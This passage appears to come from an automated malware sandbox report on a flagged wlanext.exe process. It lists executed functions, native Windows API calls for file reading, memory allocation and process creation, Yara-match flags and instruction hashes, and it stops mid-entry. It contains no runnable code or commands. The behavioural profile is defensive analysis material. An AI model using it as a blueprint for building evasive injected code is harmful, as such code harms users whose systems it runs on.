                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                  • API String ID: 885266447-3903918235
                                                                                                  • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                                  • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                                                                  • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                                  • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Analysis Process: wlanext.exe PID: 4500 Parent PID: 3472 wlanext.exeCOMMON

                                                                                                  Executed Functions

                                                                                                  Function 00AA81B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00AA3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AA3B87,007A002E,00000000,00000060,00000000,00000000), ref: 00AA81FD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 823142352-1441809116
                                                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                  • Instruction ID: 1fc2a80ab30936cedf0e5a71406ed96fd23cce8cd98e33de3131b2a267053a47
                                                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                  • Instruction Fuzzy Hash: 8FF0B6B2200108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtReadFile.NTDLL(00AA3D42,5E972F59,FFFFFFFF,00AA3A01,?,?,00AA3D42,?,00AA3A01,FFFFFFFF,5E972F59,00AA3D42,?,00000000), ref: 00AA82A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                  • Instruction ID: e8297838452f6f78bcf09436b351de2079f0adcc2b98858fa576f895b2b7b332
                                                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                  • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC85EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA838D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA83C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: 0720c30e955fbf194acbbb11b84256fba41f5b2636665ca3040ba417000a7813
                                                                                                  • Instruction ID: fec27b15c63dd0e08e47098ba6e68e66c8dc86b8a96f2a4fe272c01e8622de38
                                                                                                  • Opcode Fuzzy Hash: 0720c30e955fbf194acbbb11b84256fba41f5b2636665ca3040ba417000a7813
                                                                                                  • Instruction Fuzzy Hash: B8F015B6204108AFDB14DF88CC80EEB77ADAF88350F158249BA48A7281C634E811CBA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA8390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA83C9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2167126740-0
                                                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                  • Instruction ID: fd68ed7c849effd88097e401488bc8d0fba6f0f2db8bc1207fe9c92733d68690
                                                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                  • Instruction Fuzzy Hash: 2FF015B2200208ABDB14DF89CC81EEB77ADAF88750F118148BE0897281CA30F810CBE0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(00AA3D20,?,?,00AA3D20,00000000,FFFFFFFF), ref: 00AA8305
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                  • Instruction ID: 928c834ee44184b955c60739fc1ee466201d87b313ad0f51a9fbcb5a588447ed
                                                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                  • Instruction Fuzzy Hash: 54D012756002146BD710EF98CC45ED7775CEF44750F154455BA185B282C930F90086E0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                                                                                                  • Instruction ID: a2c3efb9282bfd52901a74b76e5b46a716b826fff9377957a9481f3a903dcea0
                                                                                                  • Opcode Fuzzy Hash: 518d5813df52a99bb589b621ca3a8758b6e16f320f4a8703b46af70ee3ba927c
                                                                                                  • Instruction Fuzzy Hash: DA90027521144812D100A59D54586460005D7E0341F91D021A5014595ECBA588917171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                                                                                                  • Instruction ID: 70c567ac5bbde512bb77cc7b4ab908c84606a0c14b9b004f86c4974e27d70a43
                                                                                                  • Opcode Fuzzy Hash: a33024f9841f94cbedd70396a3d1e2d62e058eb90fe035dbde9373969b2f1157
                                                                                                  • Instruction Fuzzy Hash: A190026D22344412D180B15D545860A0005D7D1242FD1D425A0005598CCE5588696361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                                                                                                  • Instruction ID: d093df841dab78a6c62404b0b1d58c2c24abd66330262ac74db7eaf327eefed9
                                                                                                  • Opcode Fuzzy Hash: 078bd8f4991087879366a0edc97e847dd941011e3f89dc01e1660ad6fec1ac54
                                                                                                  • Instruction Fuzzy Hash: DD90027532158812D110A15D84547060005D7D1241F91C421A0814598D8BD588917162
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                                                                                                  • Instruction ID: dba5cd200947147b505116db852d8ed751f8688d5d23b7db741e0acd41690c09
                                                                                                  • Opcode Fuzzy Hash: ce606d43e03c0165d032e42989283a179587d4a569c3d371b3f50f4b3d9d3f9a
                                                                                                  • Instruction Fuzzy Hash: A290027521144C12D180B15D445464A0005D7D1341FD1C025A0015694DCF558A5977E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                                                                                                  • Instruction ID: fe8e68fc38d1e78159e909207aecf44a4eda7234687f0a1c7ba90fc1d689aa7b
                                                                                                  • Opcode Fuzzy Hash: d02e274d16ac046a5aea72cab9c2a0f9b92918a29c534455fdc7760617b06a97
                                                                                                  • Instruction Fuzzy Hash: 92900265221C4452D200A56D4C64B070005D7D0343F91C125A0144594CCE5588616561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                                                                                                  • Instruction ID: 05639f4024afc7203f65b0d1738fe1ae17a6cc5a5bf9d282fb2b3799b2737145
                                                                                                  • Opcode Fuzzy Hash: 0c5ecd0ff4e2a644d9737d8499a49560cf63ee3efeafb48987750f3aa993e937
                                                                                                  • Instruction Fuzzy Hash: D890027521548C52D140B15D4454A460015D7D0345F91C021A00546D4D9B658D55B6A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 033996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                                                                                                  • Instruction ID: 9eda8a00cad1387e957e072f0319c70de9c9c2e1982103673fea5ef8fc6b71e5
                                                                                                  • Opcode Fuzzy Hash: 067e38556e8e77fbf0e14ac80d06d386337e9b102cd1d7a844b2caa8ac185165
                                                                                                  • Instruction Fuzzy Hash: 4C9002752114CC12D110A15D845474A0005D7D0341F95C421A4414698D8BD588917161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 033996D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                                                                                                  • Instruction ID: 0732e78e77b8ddd37b38d2b9f86eb7eeb7cdb94221b0768c80edf729631e4a49
                                                                                                  • Opcode Fuzzy Hash: 0b7acad8e80c23e4ad5c728625753c3ce60fb99138d24f8c9df364a49343f5d2
                                                                                                  • Instruction Fuzzy Hash: 4E90027521144C52D100A15D4454B460005D7E0341F91C026A0114694D8B55C8517561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                                                                                                  • Instruction ID: 37b332ebae66103deaff566fda399d8f02656c5d7f80185c3257b2e84409cc2b
                                                                                                  • Opcode Fuzzy Hash: eb7d1ce84720b1792cefc1baf30de197185cae431402526a88b9fff64eaaf8d8
                                                                                                  • Instruction Fuzzy Hash: F89002B521144812D140B15D44547460005D7D0341F91C021A5054594E8B998DD576A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                                                                                                  • Instruction ID: 8287a6ce1a5da461bccc6ecd61b1554b1e1eb475355095022bda8d899d9d744a
                                                                                                  • Opcode Fuzzy Hash: 86359cfd2e81fdad12f1dcf9e639ea5e7574348e4b31f103ac790bbc4a66842b
                                                                                                  • Instruction Fuzzy Hash: AC900269221444130105E55D07545070046D7D5391391C031F1005590CDB6188616161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 033999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                                                                                                  • Instruction ID: e15aa8bb6ed62a8f0c8e358452d77316467b88c6bc3d6e146566e4b70d67bcf7
                                                                                                  • Opcode Fuzzy Hash: d7014bdbd8cbb1313a316b1d01c798079ba6a337deec9667ac74eda08dd495b2
                                                                                                  • Instruction Fuzzy Hash: B49002A535144852D100A15D4464B060005D7E1341F91C025E1054594D8B59CC527166
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 033995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                                                                                                  • Instruction ID: cc6f2cef59f315e61246cc3cac413a1343bfd5bf0899799592ad7f29d7190c71
                                                                                                  • Opcode Fuzzy Hash: 23eb2d67ddb515c5990656571faf02a4ba1129ab58cb6607ea009cf1c6235e00
                                                                                                  • Instruction Fuzzy Hash: 3F9002A5212444134105B15D4464616400AD7E0241B91C031E10045D0DCA6588917165
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                                                                                                  • Instruction ID: 74a6e6cd2decc80382b99340635852ebfa4e32a34ed62440940e23abcbf39824
                                                                                                  • Opcode Fuzzy Hash: 379c54a4c908e82e366ca24988d3be49a108e62987ae4b021216285bf8116714
                                                                                                  • Instruction Fuzzy Hash: 8B90027521144823D111A15D45547070009D7D0281FD1C422A0414598D9B968952B161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 03399840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.497408932.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true
                                                                                                  • Associated: 00000008.00000002.498005316.000000000344B000.00000040.00000001.sdmp Download File
                                                                                                  • Associated: 00000008.00000002.498016656.000000000344F000.00000040.00000001.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                                                                                                  • Instruction ID: a8e72ded2dac34098dbdb4954c889849475a9820971e8a52779ffd6b0b41c123
                                                                                                  • Opcode Fuzzy Hash: df2b177db5bd14a0c47223fc51721f53215553dba1e9aaafd0859834b8a04fcb
                                                                                                  • Instruction Fuzzy Hash: A8900265252485625545F15D44545074006E7E02817D1C022A1404990C8A669856E661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: 6510b803bda68c70866c49e09870846219b00e1179f9ef94d4767ef2105ad7fc
                                                                                                  • Instruction ID: 9505671b6ef0f99156fc69a13431f0c9ea641af570286cad0b20e033c8f77968
                                                                                                  • Opcode Fuzzy Hash: 6510b803bda68c70866c49e09870846219b00e1179f9ef94d4767ef2105ad7fc
                                                                                                  • Instruction Fuzzy Hash: EA3192B1601704BFC711DF68D9A1FABB7B8AB49700F04841DF61A5B281D730B945CBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA6EC6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: net.dll$wininet.dll
                                                                                                  • API String ID: 3472027048-1269752229
                                                                                                  • Opcode ID: 4a080776a4a2cfff3d3f07134404c478ddbd2d561e59223432a930cc814f452d
                                                                                                  • Instruction ID: 69d90a46a029212203cd5ed334db5a895d9ef3fd0762852b200675170c82c167
                                                                                                  • Opcode Fuzzy Hash: 4a080776a4a2cfff3d3f07134404c478ddbd2d561e59223432a930cc814f452d
                                                                                                  • Instruction Fuzzy Hash: 032182B1601300AFDB10DFA8D9A1FABBBB4BB49704F14801DF619AB281D370A955CFE1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA84B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93B93), ref: 00AA84ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 9d70758c32acb761028c05b4992dd5f97d2dbf639e10b5c04f7e4758772eedef
                                                                                                  • Instruction ID: 89ba26806d92f70dfb8ef239d71175fa1e16619bef60f99b6107120013859b7c
                                                                                                  • Opcode Fuzzy Hash: 9d70758c32acb761028c05b4992dd5f97d2dbf639e10b5c04f7e4758772eedef
                                                                                                  • Instruction Fuzzy Hash: DFE06DB66402016FE714EF54DC49FE77B69EF88350F018599B9189B291D631E901CAB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93B93), ref: 00AA84ED
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID: .z`
                                                                                                  • API String ID: 3298025750-1441809116
                                                                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction ID: 59c778deacb7a0d227a43235b63255ce7017bc8757ab982acb34506581b5e6e5
                                                                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                  • Instruction Fuzzy Hash: AFE01AB12002046BDB14DF59CC49EA777ACAF88750F018554BA0857281CA30E9108AF0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00A97260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A972BA
                                                                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A972DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.495447504.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                                                  • Instruction ID: 0403cb0daf7db51ae60b3d41fbd95a9330f6ca659165d298efdd5fbcd5a7354d
                                                                                                  • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                                                                  • Instruction Fuzzy Hash: CF018431B903287AEB20A7949D43FFF76AC5B01B50F154119FF04BA1C2E794690686F5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AA84F2, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AA8584
                                                                                                  Memory Dump Source
